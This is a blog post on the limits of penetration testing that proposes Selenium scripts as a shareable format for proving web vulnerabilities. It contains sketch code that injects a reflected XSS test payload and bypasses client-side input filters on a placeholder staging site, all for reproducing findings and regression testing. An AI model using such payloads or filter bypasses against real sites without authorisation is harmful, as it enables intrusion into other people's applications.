The Forlorn Followup

Close to a year ago I wrote an article decrying the futility of pen testing; it periodically gets resuscitated on Twitter. In relatively stark terms, it called out reasons why manual web testing remains important, but insufficient, inconsistent, and imperfect. The intent was to push the boundaries of the comfort zone in which we accept, “It’s always been done this way and therefore always will.”

Recently Haroon Meer explored this topic more thoroughly at 44con with the presentation, “Penetration Testing considered harmful today”. I recommend watching the recorded presentation or reviewing the slides. Just as the topic has enormous potential for concern trolling and indifferent dismissal, it has potential for constructive discussion. If you’re a pen tester, set aside the idea that you’ve been personally attacked by the mere hint of criticism. Instead, consider the points made about the importance of pen test quality, evaluating real-world threats vs. the threat posed by a single test team, and how or why large organizations still suffer compromises (from Sony to RSA to certificate authorities). Answer those questions well and you’ll establish yourself as a premium service rather than a disposable commodity.

The question, “Are we actually improving anything?” isn’t unique to pen testing. Security software needs the same attention (thus recurring questions about whether AV remains relevant [1]). Last year’s ModSecurity challenge produced several good lessons (and should be commended for its transparency). One interesting lesson for pen testing was that the “Time to Hack” a site with SQL injection was about 10 hours. Don’t generalize that number beyond the challenge itself, but consider how relatively short that is for finding and exploiting a vulnerability, all the while bypassing a basic set of ModSecurity rules. Would the pen testing team you hired be as efficient or effective? And what would you do if you had 100 similar sites to review? Hire another 100 pen test teams?

Let’s return to web app testing. I previously lamented the lack of coherent formats for sharing test results. Static PDF files are poor enablers of improving and maintaining security after a pen test, regardless of how well-described a vulnerability may be. Instead of (or in addition to) a snapshot of the app’s security posture, a collection of reusable data would help developers not only review findings, but ensure those vulnerabilities aren’t reintroduced.

I don’t yet have a complete picture of what this web testing lingua franca would look like. A first step is taking something like Selenium: Open Source, well-supported, and based on the universal web language JavaScript. The HTTP Archive (HAR) format also promises to be useful in this regard. The ultimate goal (sketched in the example after this list) would be to:

  • Provide a common format for reproducing proof of a vulnerability.
  • With relatively self-explanatory documentation (web developers should be familiar with JavaScript regardless of whether the site uses PHP, Ruby, Java, C#, C++, QBasic, etc.).
  • In a manner that can be easily understood by another pen tester (if you’re a pen tester and don’t know basic JavaScript…).
  • In a manner that can be easily executed by a non-technical consumer (e.g. just need a browser and an Open Source plugin).
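As a strawman, here’s a minimal sketch of what such a shareable proof of concept might look like, written against the Node.js selenium-webdriver bindings. The staging URL, form field, and payload are invented placeholders, not a real finding.

    // Hypothetical, shareable PoC for a reflected XSS finding.
    // The site, form field, and payload below are placeholders.
    const { Builder, By, until } = require('selenium-webdriver');

    (async function reproduceFinding() {
      const driver = await new Builder().forBrowser('firefox').build();
      try {
        // Submit the payload through the (hypothetical) search form.
        await driver.get('https://staging.example.com/search');
        await driver.findElement(By.name('q'))
          .sendKeys('"><script>document.title="xss-poc"</script>');
        await driver.findElement(By.css('form')).submit();

        // If the title changes, the payload executed and the finding reproduces.
        await driver.wait(until.titleIs('xss-poc'), 5000);
        console.log('Finding reproduced');
      } finally {
        await driver.quit();
      }
    })();

To run it, a developer only needs a browser and the Open Source bindings; kept alongside the code, the same script doubles as a regression check that the finding hasn’t been reintroduced.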

Selenium isn’t perfectly suited as a universal approach to cataloging web vulns, but it’s close. On the one hand, with JavaScript you don’t have to leave the browser. On the other, a Selenium script still needs some massaging to deal with form-based authentication or otherwise create a session context to reach the vulnerable resource. Both of these are feasible, so this isn’t a drawback inherent to the tool. However, it will be limited by the Same Origin Policy and other browser restrictions (which could make reproducing cookie- or header-based attacks difficult).
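To make that concrete, here is a hedged sketch of establishing the session context; the login URL, field names, and credentials are placeholders. Once the form-based login runs in the browser, the session cookie rides along with every later request, but anything the browser itself forbids (cross-origin reads, restricted headers) stays out of reach.

    // Sketch: create a session context before reproducing a finding.
    // Login URL, field names, and credentials are placeholders.
    const { Builder, By, until } = require('selenium-webdriver');

    async function withAuthenticatedSession(driver) {
      await driver.get('https://staging.example.com/login');
      await driver.findElement(By.name('username')).sendKeys('qa-account');
      await driver.findElement(By.name('password')).sendKeys('not-a-real-password');
      await driver.findElement(By.css('form')).submit();
      // The session cookie now lives in the browser; later driver.get()
      // calls reach authenticated pages without replaying headers by hand.
      await driver.wait(until.urlContains('/dashboard'), 5000);
    }

    (async () => {
      const driver = await new Builder().forBrowser('firefox').build();
      try {
        await withAuthenticatedSession(driver);
        // ...now navigate to the vulnerable resource and reproduce the finding.
      } finally {
        await driver.quit();
      }
    })();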

In another example scenario, you’d have to figure out how to modify the Selenium script to bypass client-side filters. (Client-side filters are legitimate for limiting unnecessary traffic by preventing honest users from making honest mistakes. This isn’t an endorsement of client-side filters as a security control, but a nod to the reality that such filtering code would have to be dealt with.) Again, this could be done, but likely with raw JavaScript rather than any of Selenium’s pre-defined functions.
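Assuming the filter runs in keyup or submit handlers, one approach is to skip Selenium’s sendKeys() and submit() helpers and inject the value with executeScript(); calling form.submit() programmatically also skips onsubmit validation because it doesn’t fire the submit event. In this sketch the page, field name, and form index are placeholders, and driver is the same selenium-webdriver instance from the earlier sketches.

    // Sketch: sidestep a client-side input filter with raw JavaScript.
    // sendKeys() would trigger the page's keyup/change validation and the
    // payload would be stripped; setting the value and calling form.submit()
    // directly skips both that filter and any onsubmit handler.
    // The page, field name, and form index are placeholders.
    async function submitUnfiltered(driver, payload) {
      await driver.get('https://staging.example.com/profile');
      await driver.executeScript(
        "document.getElementsByName('comment')[0].value = arguments[0];" +
        "document.forms[0].submit();",
        payload
      );
    }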

Whether or not you agree with the “Futility” article or Haroon’s presentation, trolling 140 characters at a time adds little to the conversation. Why not find a better outlet to prove pen testing is already perfect (!?) or to improve its accepted deficiencies? If you can code, there are Open Source security projects to contribute to.

If you’d rather write words than code, there are projects like the OWASP Testing Guide, or you could add more language-oriented examples of countermeasures for the OWASP Top 10. It never hurts to improve the signal-to-noise ratio of web security.

=====
[1] The sandboxing in mobile devices lessens the utility of anti-virus in the desktop sense; however, tools to protect privacy, detect malicious apps, or detect undesirable apps (that intentionally scrape data) are important.